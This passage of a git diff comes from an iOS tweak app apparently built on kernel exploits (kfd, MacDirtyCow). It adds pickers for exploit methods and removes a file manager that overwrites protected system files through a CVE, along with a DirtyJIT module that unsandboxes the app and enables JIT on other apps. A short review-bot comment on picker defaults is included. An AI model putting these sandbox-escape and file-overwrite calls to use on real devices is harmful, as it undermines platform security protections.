backboard_respring() - DispatchQueue.main.async { - message = "sucecss!" 
- } - }.frame(minWidth: 0, maxWidth: .infinity, alignment: .leading).foregroundColor(Color(red: 0.678, green: 0.847, blue: 0.901, opacity: 1)) - } - - Section(header: Text("Settings")) { - Button(action: { - isSettingsPopoverPresented.toggle() - }, label: {Text("Exploit Setting")}).foregroundColor(Color(red: 0.941, green: 0.502, blue: 0.502, opacity: 1)) - Button(action: { - isTweaksPopoverPresented.toggle() - }, label: {Text("Tweak Setting")}).foregroundColor(Color(red: 0.941, green: 0.502, blue: 0.502, opacity: 1)) - }.buttonStyle(BorderlessButtonStyle()) - - Section(header: Text("Tools")) { - Text("Dirty JIT") - .foregroundColor(Color(red: 0.941, green: 0.502, blue: 0.502, opacity: 1)) - .onTapGesture { - isJITPopoverPresented.toggle() - } - Text("Swift File Manager") - .foregroundColor(Color(red: 0.941, green: 0.502, blue: 0.502, opacity: 1)) - .onTapGesture { - isSwiftFilePopoverPresented.toggle() - } - Text("File Manager") - .foregroundColor(Color(red: 0.941, green: 0.502, blue: 0.502, opacity: 1)) - .onTapGesture { - if (check_mdc()) { - do_tasks() - } else { - MacDirtyCow.unsandboxing() - } - isFilePopoverPresented.toggle() + Section { + Picker(selection: $puaf_method, label: Text("puaf method:")) { + ForEach(0 ..< puaf_method_options.count, id: \.self) { + Text(self.puaf_method_options[$0]) } + }.disabled(kfd != 0) } - } - .accentColor(.green) - .popover(isPresented: $isSettingsPopoverPresented, arrowEdge: .bottom) { - settingsPopover - } - .popover(isPresented: $isTweaksPopoverPresented, arrowEdge: .bottom) { - tweakSettings - } - .popover(isPresented: $isJITPopoverPresented, arrowEdge: .bottom) { - DirtyJITView() - } - .popover(isPresented: $isFilePopoverPresented, arrowEdge: .bottom) { - FileManagerUIKitViewControllerWrapper() - } - .popover(isPresented: $isSwiftFilePopoverPresented, arrowEdge: .bottom) { - FileManagerView() - } - } - } - - // Payload Settings Popover - private var settingsPopover: some View { - VStack { - Section(header: Text("Payload 
Settings")) { - Picker("puaf pages:", selection: $puafPages) { - ForEach(puafPagesOptions, id: \.self) { pages in - Text(String(pages)) - } - }.pickerStyle(SegmentedPickerStyle()) - .disabled(kfd != 0) - - Picker("puaf method:", selection: $puafMethod) { - ForEach(0.. [String] { - var enabledTweaks: [String] = [] - if enableHideHomebar { - enabledTweaks.append("enableHideHomebar") - } - if enableHideDock { - enabledTweaks.append("HideDock") - } - if enableCustomFont { - enabledTweaks.append("enableCustomFont") - } - if enableReplacecert { - enabledTweaks.append("enableReplacecert") - } - if changeRegion { - enabledTweaks.append("changeRegion") - } - if whitelist { - enabledTweaks.append("whitelist") - } - if supervise { - enabledTweaks.append("supervise") - } - - return enabledTweaks } } 
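Review bot: The new picker defaults `puaf_pages_index = 7` and `puaf_method = 2` are bare indices into the option arrays declared just above them, so reordering or extending either array (as this change does by appending "landa") silently changes which entry is preselected. The option arrays are also declared `private var` although nothing in the legible part of the hunk reassigns them; `private let puaf_method_options = ["physpuppet", "smith", "landa"]` states the intent, and a short comment such as `// index into puaf_method_options; 2 = "landa"` next to each default would tie the number to the entry it selects. The same applies to `kread_method` and `kwrite_method`. Part of this hunk's new side is not legible on the page, so the rest of the view body is not reviewed here.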
@@ -373,112 +83,3 @@ struct ContentView_Previews: PreviewProvider { ContentView() } } - -struct FileManagerUIKitViewControllerWrapper: UIViewControllerRepresentable { - typealias UIViewControllerType = ViewController - - func makeUIViewController(context: Context) -> ViewController { - return ViewController() - } - - func updateUIViewController(_ uiViewController: ViewController, context: Context) { - } -} - -struct MaterialView: UIViewRepresentable { - let material: UIBlurEffect.Style - - init(_ material: UIBlurEffect.Style) { - self.material = material - } - - func makeUIView(context: Context) -> UIVisualEffectView { - UIVisualEffectView(effect: UIBlurEffect(style: material)) - } - - func updateUIView(_ uiView: UIVisualEffectView, context: Context) { - uiView.effect = UIBlurEffect(style: material) - } -} - - -/* -struct AXFileViewControllerUIKitViewControllerWrapper: UIViewControllerRepresentable { - typealias UIViewControllerType = UITableViewController - - func makeUIViewController(context: Context) -> UITableViewController { - return AXFileViewController() - } - - func updateUIViewController(_ uiViewController: UITableViewController, context: Context) { - } -} - -struct withbarview: View { - @State private var selectedview: String = "kfd" - - var targetview: some View { - ZStack{ - switch selectedview { - case "kfd": - ContentView() - case "jit": - DirtyJITView() - case "file": - FileManagerUIKitViewControllerWrapper() - default: - ContentView() - } - } - } - - var body: some View { - ZStack{ - targetview - }.toolbar { - ToolbarItem(placement: .bottomBar) { - Spacer() - } - ToolbarItem(placement: .bottomBar) { - Image(systemName: "snowflake") - .resizable() - .scaledToFit() - .frame(width: 32, height: 32) - .onTapGesture{ - selectedview = "kfd" - print(selectedview) - } - } - ToolbarItem(placement: .bottomBar) { - Spacer() - } - ToolbarItem(placement: .bottomBar) { - Image(systemName: "app.connected.to.app.below.fill") - .resizable() - .scaledToFit() - 
.frame(width: 32, height: 32) - .onTapGesture{ - selectedview = "jit" - print(selectedview) - } - } - ToolbarItem(placement: .bottomBar) { - Spacer() - } - ToolbarItem(placement: .bottomBar) { - Image(systemName: "pc") - .resizable() - .scaledToFit() - .frame(width: 32, height: 32) - .onTapGesture{ - selectedview = "file" - print(selectedview) - } - } - ToolbarItem(placement: .bottomBar) { - Spacer() - } - } - } -} -*/ diff --git a/kfd/FileManager.swift b/kfd/FileManager.swift deleted file mode 100644 index e878df5a..00000000 --- a/kfd/FileManager.swift +++ /dev/null 
@@ -1,538 +0,0 @@ -// -// ContentView.swift -// files -// -// Created by Mineek on 28/12/2022. -// - -import SwiftUI -import UIKit - -// A elegant file manager for CVE-2022-446689 - -// Structs -struct File: Identifiable { - var id = UUID() - var name: String - var type: String - var size: String - var date: String -} - -struct Folder: Identifiable { - var id = UUID() - var name: String - var contents: [File] -} - -// the main magic: the CVE -// based on: https://github.com/zhuowei/WDBFontOverwrite/blob/main/WDBFontOverwrite/OverwriteFontImpl.swift#L34 -func overwriteFile(fileDataLocked: Data, pathtovictim: String) -> Bool { - let path = NSHomeDirectory() + "/Documents/tmp" - let contentString = String(data: fileDataLocked, encoding: .utf8)! - do { - try contentString.write(toFile: path, atomically: true, encoding: .utf8) - print("open", path) - } catch { - print("err:", error ) - } - print(path) - print(pathtovictim) - funVnodeOverwriteForManager(pathtovictim, path) - return true -} - -func convertPath(path: URL) -> String { - return URL(fileURLWithPath: NSHomeDirectory()).absoluteString.replacingOccurrences(of: "file://", with: "") -} - -func fileExists(atPath path: String) -> Bool { - return FileManager.default.fileExists(atPath: path) -} - -// FileManager ListItem - -struct ListItem: View { - var file: File - var body: some View { - HStack { - Image(systemName: "doc") - .resizable() - .frame(width: 20, height: 20) - VStack(alignment: .leading) { - Text(file.name) - .font(.headline) - Text(file.type) - .font(.subheadline) - } - Spacer() - VStack(alignment: .trailing) { - Text(file.size) - .font(.subheadline) - Text(file.date) - .font(.subheadline) - } - } - } -} - -class VnodeData: ObservableObject { - @Published var v_data: UInt64 = 0 - @Published var fortesting: UInt64 = 0 -} - -// FileManager ContentView, begin in path "/" -// make sure the filemanagers don't overlap -struct FileManagerView: View { - @State var path: String = "/" - @State var dir: String = 
"/" - @State var folders: [Folder] = [] - @State var files: [File] = [] - @State var empty: Bool = false - @State var orig_to_v_data: UInt64 = 0 - @State var ismounted: Bool = false - @State private var isLongPressing = false - - var body: some View { - List { - ForEach(folders, id: \.id) { folder in - NavigationLink(destination: FileManagerView(path: path + folder.name + "/", orig_to_v_data: orig_to_v_data, ismounted: ismounted)) { - HStack { - Image(systemName: "folder") - .resizable() - .frame(width: 20, height: 20) - Text(folder.name) - .font(.headline) - .contextMenu { - VStack { - Button(action: { - // ask user for direct path to FOLDER - let alert = UIAlertController(title: "mount", message: "Enter the direct path to the folder you want to mount.", preferredStyle: .alert) - alert.addTextField { (textField) in - textField.text = path + folder.name - } - alert.addAction(UIAlertAction(title: "Cancel", style: .cancel, handler: nil)) - alert.addAction(UIAlertAction(title: "Mount", style: .default, handler: { (_) in - let text = alert.textFields![0].text! 
- if text.last != "/" { - dir = text + "/" - } else { - dir = text - } - print(dir) - print(URL(fileURLWithPath: NSHomeDirectory()).absoluteString.replacingOccurrences(of: "file://", with: "") + "Documents" + dir) - if !fileExists(atPath: URL(fileURLWithPath: NSHomeDirectory()).absoluteString.replacingOccurrences(of: "file://", with: "") + "Documents" + dir) { - do { - try FileManager.default.createDirectory(atPath: URL(fileURLWithPath: NSHomeDirectory()).absoluteString.replacingOccurrences(of: "file://", with: "") + "Documents" + dir, withIntermediateDirectories: false, attributes: nil) - } catch let error { - print(error.localizedDescription) - } - } - DispatchQueue.main.async { - orig_to_v_data = mountselectedDir(dir) - ismounted = true - } - print(orig_to_v_data) - })) - UIApplication.shared.windows.first?.rootViewController?.present(alert, animated: true, completion: nil) - }) { - Text("mount ...") - Image(systemName: "mount") - } - Button(action: { - print(path.replacingOccurrences(of: NSHomeDirectory() + "/Documents", with: "") + folder.name + "/" ) - print(path.replacingOccurrences(of: "file://", with: "") + folder.name + "/") - DispatchQueue.main.async { - orig_to_v_data = mountselectedDir(path.replacingOccurrences(of: NSHomeDirectory() + "/Documents", with: "") + folder.name + "/") - ismounted = true - } - print(orig_to_v_data) - }) - { - Text("mount original folder") - Image(systemName: "mount") - } - if(ismounted) { - Button(action: { - print(orig_to_v_data) - print(path.replacingOccurrences(of: "file://", with: "") + folder.name + "/") - unmountselectedDir(orig_to_v_data, path.replacingOccurrences(of: "file://", with: "") + folder.name + "/") - ismounted = false - orig_to_v_data = 0 - }) - { - Text("unmount selected folder") - Image(systemName: "mount") - } - } - } - - Button(action: { - path = URL(fileURLWithPath: NSHomeDirectory()).absoluteString.replacingOccurrences(of: "file://", with: "") - // navigate to the new path - folders = [] - files = [] - 
let fileManager = FileManager.default - let enumerator = fileManager.enumerator(atPath: path) - while let element = enumerator?.nextObject() as? String { - // only do the top level files and folders - if element.contains("/") { - continue - } - let attrs = try! fileManager.attributesOfItem(atPath: path + element) - let type = attrs[.type] as! FileAttributeType - if type == .typeDirectory { - folders.append(Folder(name: element, contents: [])) - } else if type == .typeRegular { - let size = attrs[.size] as! UInt64 - let date = attrs[.modificationDate] as! Date - let dateFormatter = DateFormatter() - dateFormatter.dateFormat = "MMM dd, yyyy" - let dateString = dateFormatter.string(from: date) - let sizeString = ByteCountFormatter.string(fromByteCount: Int64(size), countStyle: .file) - let fileExtension = element.split(separator: ".").last! - files.append(File(name: element, type: "\(fileExtension)", size: sizeString, date: dateString)) - } - } - if folders.count == 0 && files.count == 0 { - empty = true - } else { - empty = false - } - }) - { - Text("go to home") - Image(systemName: "house") - } - } - } - } - } - ForEach(files, id: \.id) { file in - Button(action: { - // if the file is a plist, open the plist editor - if file.type == "plist" || file.type == "strings" { - let fileManager = FileManager.default - let data = fileManager.contents(atPath: path + file.name) - let plist = try! PropertyListSerialization.propertyList(from: data!, options: [], format: nil) as! [String: Any] - let keys = plist.keys.sorted() - var values: [String] = [] - var types: [String] = [] - for key in keys { - let value = plist[key]! 
- values.append("\(value)") - types.append("\(type(of: value))") - } - let vc = UIHostingController(rootView: PlistEditorView(path: path + file.name, plist: plist, keys: keys, values: values, types: types)) - UIApplication.shared.windows.first?.rootViewController?.present(vc, animated: true, completion: nil) - } else { - // use TextEditor to edit the file - let vc = UIHostingController(rootView: TextEditorView(path: path + file.name)) - UIApplication.shared.windows.first?.rootViewController?.present(vc, animated: true, completion: nil) - } - }) { - ListItem(file: file) - } - } - if empty { - Text("Awww, sandbox has blocked us from viewing this folder :(") - Text("If you know the direct path, please enter it here.") - Button(action: { - // ask user for direct path to FOLDER - let alert = UIAlertController(title: "Enter Direct Path", message: "Enter the direct path to the folder you want to access.", preferredStyle: .alert) - alert.addTextField { (textField) in - textField.text = path - } - alert.addAction(UIAlertAction(title: "Cancel", style: .cancel, handler: nil)) - alert.addAction(UIAlertAction(title: "Enter", style: .default, handler: { (_) in - let text = alert.textFields![0].text! - if text.last != "/" { - path = text + "/" - } else { - path = text - } - // navigate to the new path - folders = [] - files = [] - let fileManager = FileManager.default - let enumerator = fileManager.enumerator(atPath: path) - while let element = enumerator?.nextObject() as? String { - // only do the top level files and folders - if element.contains("/") { - continue - } - let attrs = try! fileManager.attributesOfItem(atPath: path + element) - let type = attrs[.type] as! FileAttributeType - if type == .typeDirectory { - folders.append(Folder(name: element, contents: [])) - } else if type == .typeRegular { - let size = attrs[.size] as! UInt64 - let date = attrs[.modificationDate] as! 
Date - let dateFormatter = DateFormatter() - dateFormatter.dateFormat = "MMM dd, yyyy" - let dateString = dateFormatter.string(from: date) - let sizeString = ByteCountFormatter.string(fromByteCount: Int64(size), countStyle: .file) - let fileExtension = element.split(separator: ".").last! - files.append(File(name: element, type: "\(fileExtension)", size: sizeString, date: dateString)) - } - } - if folders.count == 0 && files.count == 0 { - empty = true - } else { - empty = false - } - })) - UIApplication.shared.windows.first?.rootViewController?.present(alert, animated: true, completion: nil) - }) { - Text("Enter Direct Path") - } - } - } - .navigationTitle(path) - .onAppear(perform: { - // clear the arrays - folders = [] - files = [] - let fileManager = FileManager.default - let enumerator = fileManager.enumerator(atPath: path) - while let element = enumerator?.nextObject() as? String { - // only do the top level files and folders - if element.contains("/") { - continue - } - let attrs = try! fileManager.attributesOfItem(atPath: path + element) - let type = attrs[.type] as! FileAttributeType - if type == .typeDirectory { - folders.append(Folder(name: element, contents: [])) - } else if type == .typeRegular { - let size = attrs[.size] as! UInt64 - let date = attrs[.modificationDate] as! 
Date - let formatter = DateFormatter() - formatter.dateStyle = .short - formatter.timeStyle = .short - let dateString = formatter.string(from: date) - var sizeString = "" - if size < 1024 { - sizeString = "\(size) B" - } else if size < 1024 * 1024 { - sizeString = "\(size / 1024) KB" - } else if size < 1024 * 1024 * 1024 { - sizeString = "\(size / 1024 / 1024) MB" - } else { - sizeString = "\(size / 1024 / 1024 / 1024) GB" - } - files.append(File(name: element, type: element.components(separatedBy: ".").last!, size: sizeString, date: dateString)) - } - } - // if they're empty, add a "no files" message in gray - if folders.isEmpty && files.isEmpty { - empty = true - } - }) - } -} - -// PlistEditorView -struct PlistEditorView: View { - @State var path: String - @State var plist: [String: Any] = [:] - @State var keys: [String] = [] - @State var values: [String] = [] - @State var types: [String] = [] - @State var newKey: String = "" - @State var newValue: String = "" - @State var newType: String = "String" - @State var showAdd: Bool = false - @State var showEdit: Bool = false - @State var editIndex: Int = 0 - @State var showDelete: Bool = false - @State var deleteIndex: Int = 0 - var body: some View { - VStack { - List { - ForEach(keys.indices, id: \.self) { index in - HStack { - // check if they're in range - if index < keys.count && index < values.count && index < types.count { - Text(keys[index]) - .font(.headline) - Spacer() - Text(values[index]) - .font(.subheadline) - Text(types[index]) - .font(.subheadline) - } - } - .onTapGesture { - showEdit = true - editIndex = index - } - .contextMenu { - Button(action: { - showEdit = true - editIndex = index - }) { - Text("Edit") - } - Button(action: { - showDelete = true - deleteIndex = index - }) { - Text("Delete") - } - } - } - } - .sheet(isPresented: $showAdd) { - VStack { - Text("Add Key") - .font(.title) - TextField("Key", text: $newKey) - .textFieldStyle(RoundedBorderTextFieldStyle()) - TextField("Value", text: 
$newValue) - .textFieldStyle(RoundedBorderTextFieldStyle()) - Picker("Type", selection: $newType) { - Text("String").tag("String") - Text("Integer").tag("Integer") - Text("Boolean").tag("Boolean") - Text("Float").tag("Float") - Text("Double").tag("Double") - } - .pickerStyle(SegmentedPickerStyle()) - Button(action: { - if newKey != "" && newValue != "" { - keys.append(newKey) - values.append(newValue) - types.append(newType) - newKey = "" - newValue = "" - newType = "String" - showAdd = false - } - }) { - Text("Add") - } - } - .padding() - } - .sheet(isPresented: $showEdit) { - VStack { - Text("Edit Key") - .font(.title) - TextField("Key", text: $keys[editIndex]) - .textFieldStyle(RoundedBorderTextFieldStyle()) - TextField("Value", text: $values[editIndex]) - .textFieldStyle(RoundedBorderTextFieldStyle()) - Picker("Type", selection: $types[editIndex]) { - Text("String").tag("String") - Text("Integer").tag("Integer") - Text("Boolean").tag("Boolean") - Text("Float").tag("Float") - Text("Double").tag("Double") - } - .pickerStyle(SegmentedPickerStyle()) - Button(action: { - showEdit = false - }) { - Text("Done") - } - } - .padding() - } - .alert(isPresented: $showDelete) { - Alert(title: Text("Delete Key"), message: Text("Are you sure you want to delete the key \(keys[deleteIndex])?"), primaryButton: .destructive(Text("Delete")) { - keys.remove(at: deleteIndex) - values.remove(at: deleteIndex) - types.remove(at: deleteIndex) - showDelete = false - }, secondaryButton: .cancel()) - } - HStack { - Button(action: { - showAdd = true - }) { - Text("Add") - } - Spacer() - Button(action: { - // save the plist - for index in keys.indices { - if types[index] == "String" { - plist[keys[index]] = values[index] - } else if types[index] == "Integer" { - plist[keys[index]] = Int(values[index]) - } else if types[index] == "Boolean" { - plist[keys[index]] = Bool(values[index]) - } else if types[index] == "Float" { - plist[keys[index]] = Float(values[index]) - } else if types[index] == 
"Double" { - plist[keys[index]] = Double(values[index]) - } - } - let data = try! PropertyListSerialization.data(fromPropertyList: plist, format: .xml, options: 0) - // use the CVE to write the file - overwriteFile(fileDataLocked: data, pathtovictim: path) - }) { - Text("Save") - } - } - } - .onAppear { - let data = try! Data(contentsOf: URL(fileURLWithPath: path)) - plist = try! PropertyListSerialization.propertyList(from: data, options: [], format: nil) as! [String: Any] - for (key, value) in plist { - keys.append(key) - if value is String { - values.append(value as! String) - types.append("String") - } else if value is Int { - values.append(String(value as! Int)) - types.append("Integer") - } else if value is Bool { - values.append(String(value as! Bool)) - types.append("Boolean") - } else if value is Float { - values.append(String(value as! Float)) - types.append("Float") - } else if value is Double { - values.append(String(value as! Double)) - types.append("Double") - } - } - } - } -} - -// TextEditorView, a view that allows the user to edit a file if it isn't a plist -struct TextEditorView: View { - @State var path: String - @State var text: String = "" - var body: some View { - VStack { - TextEditor(text: $text) - .padding() - HStack { - Spacer() - Button(action: { - // save the file - let data = text.data(using: .utf8)! - // use the CVE to write the file - overwriteFile(fileDataLocked: data, pathtovictim: path) - }) { - Text("Save") - } - } - } - .onAppear { - do { - text = try String(contentsOf: URL(fileURLWithPath: path), encoding: .utf8) - } catch { - let alert = UIAlertController(title: "Error", message: "The file could not be opened.", preferredStyle: .alert) - alert.addAction(UIAlertAction(title: "OK", style: .default, handler: nil)) - UIApplication.shared.windows.first?.rootViewController?.dismiss(animated: true, completion: { - UIApplication.shared.windows.first?.rootViewController?.present(alert, animated: true, completion: nil) - }) - } - } - } -} 
diff --git a/kfd/JIT/ApplicationManager.swift b/kfd/JIT/ApplicationManager.swift
deleted file mode 100644
index 05b5300c..00000000
--- a/kfd/JIT/ApplicationManager.swift
+++ /dev/null
@@ -1,104 +0,0 @@
-//
-// ApplicationManager.swift
-// Cache
-//
-// Created by Hariz Shirazi on 2023-03-03.
-//
-
-import Foundation
-import UIKit
-
-// does nothing lololo
-enum GenericError: Error {
- case runtimeError(String)
-}
-
-// stolen from appabetical :trolley:
-class ApplicationManager2 {
- private static var fm = FileManager.default
- static var shared = ApplicationManager2()
-
- private static let userApplicationsUrl = URL(fileURLWithPath: "/var/containers/Bundle/Application", isDirectory: true)
-
- static func getApps() throws -> [SBApp2] {
- var dotAppDirs: [URL] = []
-
- let userAppsDir = try fm.contentsOfDirectory(at: userApplicationsUrl, includingPropertiesForKeys: nil)
-
- for userAppFolder in userAppsDir {
- let userAppFolderContents = try fm.contentsOfDirectory(at: userAppFolder, includingPropertiesForKeys: nil)
- if let dotApp = userAppFolderContents.first(where: { $0.absoluteString.hasSuffix(".app/") }) {
- dotAppDirs.append(dotApp)
- }
- }
-
- var apps2: [SBApp2] = []
-
- for bundleUrl in dotAppDirs {
- let infoPlistUrl = bundleUrl.appendingPathComponent("Info.plist")
- if !fm.fileExists(atPath: infoPlistUrl.path) {
- // some system apps don't have it, just ignore it and move on.
- continue
- }
-
- guard let infoPlist = NSDictionary(contentsOf: infoPlistUrl) as? [String:AnyObject] else { UIApplication.shared.alert(title: "Error", body: "Error opening info.plist for \(bundleUrl.absoluteString)"); throw GenericError.runtimeError("Error opening info.plist for \(bundleUrl.absoluteString)") }
- guard let CFBundleIdentifier = infoPlist["CFBundleIdentifier"] as? String else { UIApplication.shared.alert(title: "Error", body: "App \(bundleUrl.absoluteString) doesn't have bundleid"); throw GenericError.runtimeError("App \(bundleUrl.absoluteString) doesn't have bundleid")}
-
- var app2 = SBApp2(bundleIdentifier: CFBundleIdentifier, name: "Unknown", bundleURL: bundleUrl, pngIconPaths: [], hiddenFromSpringboard: false)
-
- if infoPlist.keys.contains("CFBundleDisplayName") {
- guard let CFBundleDisplayName = infoPlist["CFBundleDisplayName"] as? String else { UIApplication.shared.alert(title: "Error", body: "Error reading display name for \(bundleUrl.absoluteString)"); throw GenericError.runtimeError("Error reading display name for \(bundleUrl.absoluteString)") }
- app2.name = CFBundleDisplayName
- } else if infoPlist.keys.contains("CFBundleName") {
- guard let CFBundleName = infoPlist["CFBundleName"] as? String else { UIApplication.shared.alert(title: "Error", body: "Error reading name for \(bundleUrl.absoluteString)");throw GenericError.runtimeError("Error reading name for \(bundleUrl.absoluteString)")}
- app2.name = CFBundleName
- }
-
- // obtaining png icons inside bundle. defined in info.plist
- if app2.bundleIdentifier == "com.apple.mobiletimer" {
- // use correct paths for clock, because it has arrows
- app2.pngIconPaths += ["circle_borderless@2x~iphone.png"]
- }
- if let CFBundleIcons = infoPlist["CFBundleIcons"] {
- if let CFBundlePrimaryIcon = CFBundleIcons["CFBundlePrimaryIcon"] as? [String : AnyObject] {
- if let CFBundleIconFiles = CFBundlePrimaryIcon["CFBundleIconFiles"] as? [String] {
- app2.pngIconPaths += CFBundleIconFiles.map { $0 + "@2x.png"}
- }
- }
- }
- if infoPlist.keys.contains("CFBundleIconFile") {
- // happens in the case of pseudo-installed apps
- if let CFBundleIconFile = infoPlist["CFBundleIconFile"] as? String {
- app2.pngIconPaths.append(CFBundleIconFile + ".png")
- }
- }
- if infoPlist.keys.contains("CFBundleIconFiles") {
- // only seen this happen in the case of Wallet
- if let CFBundleIconFiles = infoPlist["CFBundleIconFiles"] as? [String], !CFBundleIconFiles.isEmpty {
- app2.pngIconPaths += CFBundleIconFiles.map { $0 + ".png" }
- }
- }
-
-
- apps2.append(app2)
- }
-
- return apps2
- }
-
- func openApp(_ BundleID: String) {
- guard let obj = objc_getClass("LSApplicationWorkspace") as? NSObject else { return }
- let workspace = obj.perform(Selector(("defaultWorkspace")))?.takeUnretainedValue() as? NSObject
- workspace?.perform(Selector(("openApplicationWithBundleID:")), with: BundleID)
- }
-}
-
-struct SBApp2: Identifiable, Equatable {
- var id = UUID()
- var bundleIdentifier: String
- var name: String
- var bundleURL: URL
-
- var pngIconPaths: [String]
- var hiddenFromSpringboard: Bool
-}
diff --git a/kfd/JIT/DirtyJIT/Alert++.swift b/kfd/JIT/DirtyJIT/Alert++.swift
deleted file mode 100644
index f20e60e3..00000000
--- a/kfd/JIT/DirtyJIT/Alert++.swift
+++ /dev/null
@@ -1,72 +0,0 @@
-//
-// Alert++.swift
-// Cowabunga
-//
-// Created by sourcelocation on 30/01/2023.
-//
-
-import UIKit
-
-// credit: sourcelocation & TrollTools
-var currentUIAlertController: UIAlertController?
-
-
-fileprivate let errorString = NSLocalizedString("Error", comment: "")
-fileprivate let okString = NSLocalizedString("OK", comment: "")
-fileprivate let cancelString = NSLocalizedString("Cancel", comment: "")
-
-extension UIApplication {
-
- func dismissAlert(animated: Bool) {
- DispatchQueue.main.async {
- currentUIAlertController?.dismiss(animated: animated)
- }
- }
- func alert(title: String = errorString, body: String, animated: Bool = true, withButton: Bool = true) {
- DispatchQueue.main.async {
- var body = body
-
- if title == errorString {
- // append debug info
- let device = UIDevice.current
- let appVersion = Bundle.main.infoDictionary?["CFBundleShortVersionString"] as? String ?? ""
- let appBuild = Bundle.main.infoDictionary?["CFBundleVersion"] as? String ?? ""
- let systemVersion = device.systemVersion
- body += "\n\(device.systemName) \(systemVersion), version \(appVersion) build \(appBuild) escaped=\(FileManager.default.isReadableFile(atPath: "/var/mobile"))"
- }
-
- currentUIAlertController = UIAlertController(title: title, message: body, preferredStyle: .alert)
- if withButton { currentUIAlertController?.addAction(.init(title: okString, style: .cancel)) }
- self.present(alert: currentUIAlertController!)
- }
- }
- func confirmAlert(title: String = errorString, body: String, confirmTitle: String = okString, onOK: @escaping () -> (), noCancel: Bool) {
- DispatchQueue.main.async {
- currentUIAlertController = UIAlertController(title: title, message: body, preferredStyle: .alert)
- if !noCancel {
- currentUIAlertController?.addAction(.init(title: cancelString, style: .cancel))
- }
- currentUIAlertController?.addAction(.init(title: confirmTitle, style: noCancel ? .cancel : .default, handler: { _ in
- onOK()
- }))
- self.present(alert: currentUIAlertController!)
- }
- }
- func change(title: String = errorString, body: String) {
- DispatchQueue.main.async {
- currentUIAlertController?.title = title
- currentUIAlertController?.message = body
- }
- }
-
- func present(alert: UIAlertController) {
- if var topController = self.windows[0].rootViewController {
- while let presentedViewController = topController.presentedViewController {
- topController = presentedViewController
- }
-
- topController.present(alert, animated: true)
- // topController should now be your topmost view controller
- }
- }
-}
diff --git a/kfd/JIT/DirtyJIT/AppsView.swift b/kfd/JIT/DirtyJIT/AppsView.swift
deleted file mode 100644
index 12001a87..00000000
--- a/kfd/JIT/DirtyJIT/AppsView.swift
+++ /dev/null
@@ -1,60 +0,0 @@
-//
-// AppsView.swift
-// DirtyJIT
-//
-// Created by Анохин Юрий on 05.03.2023.
-//
-
-import SwiftUI
-import MacDirtyCow
-
-struct AppsView: View {
- @Binding var searchText: String
- let apps2: [SBApp2]
- let appsManager2 = ApplicationManager2.shared
-
- var body: some View {
- List(apps2.filter { searchText.isEmpty || $0.name.localizedCaseInsensitiveContains(searchText) }) { app2 in
- HStack {
- if let image = UIImage(contentsOfFile: app2.bundleURL.appendingPathComponent(app2.pngIconPaths.first ?? "").path) {
- Image(uiImage: image)
- .resizable()
- .aspectRatio(contentMode: .fit)
- .frame(width: 44, height: 44)
- .cornerRadius(10)
- } else {
- Image("DefaultIcon")
- .resizable()
- .aspectRatio(contentMode: .fit)
- .frame(width: 44, height: 44)
- .cornerRadius(10)
- }
- VStack(alignment: .leading) {
- Text(app2.name)
- .font(.headline)
- Text(app2.bundleIdentifier)
- .font(.subheadline)
- .foregroundColor(.secondary)
- }
- }
- .onTapGesture {
- UIApplication.shared.confirmAlert(title: "Warning", body: "We will now try to enable JIT on \(app2.name). Make sure the app is opened in the background so we can find it's PID!", onOK: {
- UIApplication.shared.alert(title: "Please wait", body: "Enabling JIT...", withButton: false)
-
- MacDirtyCow.Swiftcallps()
-
- DispatchQueue.main.asyncAfter(deadline: .now() + 1) {
- UIApplication.shared.dismissAlert(animated: true)
-
- MacDirtyCow.enableJIT(pidApp: MacDirtyCow.returnPID(exec: app2.name))
-
- DispatchQueue.main.asyncAfter(deadline: .now() + 0.5) {
- appsManager2.openApp(app2.bundleIdentifier)
- }
- }
- }, noCancel: false)
- }
- }
- .environment(\.defaultMinListRowHeight, 50)
- }
-}
diff --git a/kfd/JIT/DirtyJIT/DirtyJITView.swift b/kfd/JIT/DirtyJIT/DirtyJITView.swift
deleted file mode 100644
index 52693596..00000000
--- a/kfd/JIT/DirtyJIT/DirtyJITView.swift
+++ /dev/null
@@ -1,56 +0,0 @@
-//
-// ContentView.swift
-// DirtyJIT
-//
-// Created by Анохин Юрий on 03.03.2023.
-//
-
-import SwiftUI
-import MacDirtyCow
-
-@available(iOS 15.0, *)
-struct DirtyJITView: View {
- @AppStorage("firstTime") private var firstTime = true
- @State var apps2: [SBApp2] = []
- @State private var searchText = ""
- @State private var presentAlert = false
-
- var body: some View {
- VStack {
- AppsView(searchText: $searchText, apps2: apps2)
- .navigationBarTitle("DirtyJIT", displayMode: .inline)
- .toolbar {
- Button {
- presentAlert = true
- } label: {
- Image(systemName: "magnifyingglass")
- }
- }
- }
-// .sheet(isPresented: $firstTime, content: SetupView.init)
- .onAppear {
- UIApplication.shared.alert(title: "Loading", body: "Please wait...", withButton: false)
-
- func unsandboxing() {
- do {
- try MacDirtyCow.unsandbox()
- } catch {
- print(error)
- }
- }
- unsandboxing()
- DispatchQueue.main.asyncAfter(deadline: .now() + 3) {
- UIApplication.shared.dismissAlert(animated: false)
-
- do {
- apps2 = try ApplicationManager2.getApps()
- } catch {
- UIApplication.shared.alert(title: "Error", body: error.localizedDescription, withButton: true)
- }
- }
- }
- .textFieldAlert(isPresented: $presentAlert) { () -> TextFieldAlert in
- TextFieldAlert(title: "Enter app name", message: "Search for the app you want to find, make sure you spell it right!", text: Binding($searchText))
- }
- }
-}
diff --git a/kfd/JIT/DirtyJIT/SearchBar.swift b/kfd/JIT/DirtyJIT/SearchBar.swift
deleted file mode 100644
index b69ed5cd..00000000
--- a/kfd/JIT/DirtyJIT/SearchBar.swift
+++ /dev/null
@@ -1,50 +0,0 @@
-//
-// SearchBar.swift
-// DirtyJIT
-//
-// Created by Анохин Юрий on 05.03.2023.
-//
-
-import SwiftUI
-
-struct SearchBar: View {
- @Binding var text: String
- @State private var isEditing = false
-
- var body: some View {
- HStack {
- ZStack {
- Rectangle()
- .foregroundColor(Color(.systemGray6))
- .cornerRadius(10)
- HStack(spacing: 8) {
- Image(systemName: "magnifyingglass")
- .foregroundColor(.secondary)
- .padding(.leading, 8)
- TextField("Search", text: $text, onEditingChanged: { editing in
- self.isEditing = editing
- })
- .foregroundColor(.primary)
- .accentColor(.primary)
- .background(Color(.systemGray6))
- .cornerRadius(10)
- .padding(.trailing, isEditing ? 0 : 32)
- .frame(height: 36)
- if isEditing {
- Button(action: {
- self.isEditing = false
- self.text = ""
- UIApplication.shared.sendAction(#selector(UIResponder.resignFirstResponder), to: nil, from: nil, for: nil)
- }) {
- Image(systemName: "xmark.circle.fill")
